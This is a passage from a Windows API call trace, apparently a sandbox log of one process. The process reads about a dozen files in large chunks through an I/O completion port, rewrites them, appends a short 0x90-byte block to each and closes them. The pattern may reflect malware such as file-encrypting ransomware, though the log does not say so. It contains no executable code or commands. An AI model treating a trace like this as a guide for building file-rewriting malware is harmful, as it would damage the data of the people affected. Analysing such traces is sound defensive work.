lpOverlapped=0x4f70020 | out: lpBuffer=0x4f70124*, lpNumberOfBytesRead=0x41eff48*=0x0, lpOverlapped=0x4f70020) returned 1 [0148.669] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0148.669] ReadFile (in: hFile=0x368, lpBuffer=0x5090124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x41eff48, lpOverlapped=0x5090020 | out: lpBuffer=0x5090124*, lpNumberOfBytesRead=0x41eff48*=0x0, lpOverlapped=0x5090020) returned 1 [0148.670] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0148.670] WriteFile (in: hFile=0x654, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x583d, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x41f0020) returned 1 [0148.670] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0148.670] WriteFile (in: hFile=0x660, lpBuffer=0x4670124*, nNumberOfBytesToWrite=0x43b9, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x4670020 | out: lpBuffer=0x4670124*, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x4670020) returned 1 [0148.670] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0148.670] WriteFile (in: hFile=0x640, lpBuffer=0x4790124*, nNumberOfBytesToWrite=0xd376, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x4790020 | out: lpBuffer=0x4790124*, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x4790020) returned 1 [0148.673] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0148.673] WriteFile (in: hFile=0x65c, lpBuffer=0x48b0124*, nNumberOfBytesToWrite=0x2f40, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x48b0020 | out: lpBuffer=0x48b0124*, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x48b0020) returned 1 [0148.673] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0148.674] WriteFile (in: hFile=0x624, lpBuffer=0x49d0124*, nNumberOfBytesToWrite=0xc2db, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x49d0020 | out: lpBuffer=0x49d0124*, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x49d0020) returned 1 [0148.674] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0148.674] WriteFile (in: hFile=0x64c, lpBuffer=0x4af0124*, nNumberOfBytesToWrite=0x125c6, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x4af0020 | out: lpBuffer=0x4af0124*, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x4af0020) returned 1 [0148.674] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0148.675] WriteFile (in: hFile=0x634, lpBuffer=0x4c10124*, nNumberOfBytesToWrite=0x875b, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x4c10020 | out: lpBuffer=0x4c10124*, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x4c10020) returned 1 [0148.675] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0148.675] WriteFile (in: hFile=0x638, lpBuffer=0x4d30124*, nNumberOfBytesToWrite=0x173c9, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x4d30020 | out: lpBuffer=0x4d30124*, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x4d30020) returned 1 [0148.676] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0148.676] WriteFile (in: hFile=0x1a8, lpBuffer=0x4e50124*, nNumberOfBytesToWrite=0x9b7b, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x4e50020 | out: lpBuffer=0x4e50124*, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x4e50020) returned 1 [0148.676] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0148.676] WriteFile (in: hFile=0x614, lpBuffer=0x4f70124*, nNumberOfBytesToWrite=0x133e1, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x4f70020 | out: lpBuffer=0x4f70124*, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x4f70020) returned 1 [0148.677] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0148.677] WriteFile (in: hFile=0x368, lpBuffer=0x5090124*, nNumberOfBytesToWrite=0x238c, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x5090020 | out: lpBuffer=0x5090124*, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x5090020) returned 1 [0148.677] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0148.677] ReadFile (in: hFile=0x654, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x41eff48, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124, lpNumberOfBytesRead=0x41eff48*=0x0, lpOverlapped=0x41f0020) returned 0x0 [0148.677] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0148.677] ReadFile (in: hFile=0x660, lpBuffer=0x4670124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x41eff48, lpOverlapped=0x4670020 | out: lpBuffer=0x4670124, lpNumberOfBytesRead=0x41eff48*=0x0, lpOverlapped=0x4670020) returned 0x0 [0148.677] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0148.677] ReadFile (in: hFile=0x640, lpBuffer=0x4790124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x41eff48, lpOverlapped=0x4790020 | out: lpBuffer=0x4790124, lpNumberOfBytesRead=0x41eff48*=0x0, lpOverlapped=0x4790020) returned 0x0 [0148.677] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0148.677] ReadFile (in: hFile=0x65c, lpBuffer=0x48b0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x41eff48, lpOverlapped=0x48b0020 | out: lpBuffer=0x48b0124, lpNumberOfBytesRead=0x41eff48*=0x0, lpOverlapped=0x48b0020) returned 0x0 [0148.677] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0148.677] ReadFile (in: hFile=0x624, lpBuffer=0x49d0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x41eff48, lpOverlapped=0x49d0020 | out: lpBuffer=0x49d0124, lpNumberOfBytesRead=0x41eff48*=0x0, lpOverlapped=0x49d0020) returned 0x0 [0148.678] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0148.678] ReadFile (in: hFile=0x64c, lpBuffer=0x4af0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x41eff48, lpOverlapped=0x4af0020 | out: lpBuffer=0x4af0124, lpNumberOfBytesRead=0x41eff48*=0x0, lpOverlapped=0x4af0020) returned 0x0 [0148.678] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0148.678] ReadFile (in: hFile=0x634, lpBuffer=0x4c10124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x41eff48, lpOverlapped=0x4c10020 | out: lpBuffer=0x4c10124, lpNumberOfBytesRead=0x41eff48*=0x0, lpOverlapped=0x4c10020) returned 0x0 [0148.678] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0148.678] ReadFile (in: hFile=0x638, lpBuffer=0x4d30124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x41eff48, lpOverlapped=0x4d30020 | out: lpBuffer=0x4d30124, lpNumberOfBytesRead=0x41eff48*=0x0, lpOverlapped=0x4d30020) returned 0x0 [0148.678] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0148.678] ReadFile (in: hFile=0x1a8, lpBuffer=0x4e50124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x41eff48, lpOverlapped=0x4e50020 | out: lpBuffer=0x4e50124, lpNumberOfBytesRead=0x41eff48*=0x0, lpOverlapped=0x4e50020) returned 0x0 [0148.678] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0148.678] ReadFile (in: hFile=0x614, lpBuffer=0x4f70124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x41eff48, lpOverlapped=0x4f70020 | out: lpBuffer=0x4f70124, lpNumberOfBytesRead=0x41eff48*=0x0, lpOverlapped=0x4f70020) returned 0x0 [0148.678] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0148.678] ReadFile (in: hFile=0x368, lpBuffer=0x5090124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x41eff48, lpOverlapped=0x5090020 | out: lpBuffer=0x5090124, lpNumberOfBytesRead=0x41eff48*=0x0, lpOverlapped=0x5090020) returned 0x0 [0148.678] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 0 [0148.679] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x41f0020) returned 1 [0148.679] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 0 [0148.679] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4670020) returned 1 [0148.679] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 0 [0148.679] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4790020) returned 1 [0148.679] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 0 [0148.679] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x48b0020) returned 1 [0148.679] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 0 [0148.679] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x49d0020) returned 1 [0148.679] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 0 [0148.679] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4af0020) returned 1 [0148.679] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 0 [0148.679] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4c10020) returned 1 [0148.679] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 0 [0148.679] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4d30020) returned 1 [0148.679] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 0 [0148.679] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4e50020) returned 1 [0148.679] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 0 [0148.680] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4f70020) returned 1 [0148.680] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 0 [0148.680] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x5090020) returned 1 [0148.680] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0148.680] WriteFile (in: hFile=0x654, lpBuffer=0x41f0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0094*, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x41f0020) returned 1 [0148.680] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0148.680] WriteFile (in: hFile=0x660, lpBuffer=0x4670094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x4670020 | out: lpBuffer=0x4670094*, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x4670020) returned 1 [0148.680] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0148.680] WriteFile (in: hFile=0x640, lpBuffer=0x4790094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x4790020 | out: lpBuffer=0x4790094*, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x4790020) returned 1 [0148.680] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0148.680] WriteFile (in: hFile=0x65c, lpBuffer=0x48b0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x48b0020 | out: lpBuffer=0x48b0094*, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x48b0020) returned 1 [0148.680] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0148.680] WriteFile (in: hFile=0x624, lpBuffer=0x49d0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x49d0020 | out: lpBuffer=0x49d0094*, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x49d0020) returned 1 [0148.680] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0148.681] WriteFile (in: hFile=0x64c, lpBuffer=0x4af0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x4af0020 | out: lpBuffer=0x4af0094*, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x4af0020) returned 1 [0148.681] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0148.681] WriteFile (in: hFile=0x634, lpBuffer=0x4c10094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x4c10020 | out: lpBuffer=0x4c10094*, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x4c10020) returned 1 [0148.681] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0148.681] WriteFile (in: hFile=0x638, lpBuffer=0x4d30094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x4d30020 | out: lpBuffer=0x4d30094*, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x4d30020) returned 1 [0148.681] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0148.681] WriteFile (in: hFile=0x1a8, lpBuffer=0x4e50094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x4e50020 | out: lpBuffer=0x4e50094*, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x4e50020) returned 1 [0148.681] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0148.681] WriteFile (in: hFile=0x614, lpBuffer=0x4f70094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x4f70020 | out: lpBuffer=0x4f70094*, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x4f70020) returned 1 [0148.681] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0148.681] WriteFile (in: hFile=0x368, lpBuffer=0x5090094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x5090020 | out: lpBuffer=0x5090094*, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x5090020) returned 1 [0148.681] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0148.682] CloseHandle (hObject=0x654) returned 1 [0148.686] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x41f0020) returned 1 [0148.686] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0148.686] CloseHandle (hObject=0x660) returned 1 [0148.687] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4670020) returned 1 [0148.688] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0148.688] CloseHandle (hObject=0x640) returned 1 [0148.689] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4790020) returned 1 [0148.689] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0148.689] CloseHandle (hObject=0x65c) returned 1 [0148.690] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x48b0020) returned 1 [0148.690] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0148.690] CloseHandle (hObject=0x624) returned 1 [0148.691] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x49d0020) returned 1 [0148.691] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, 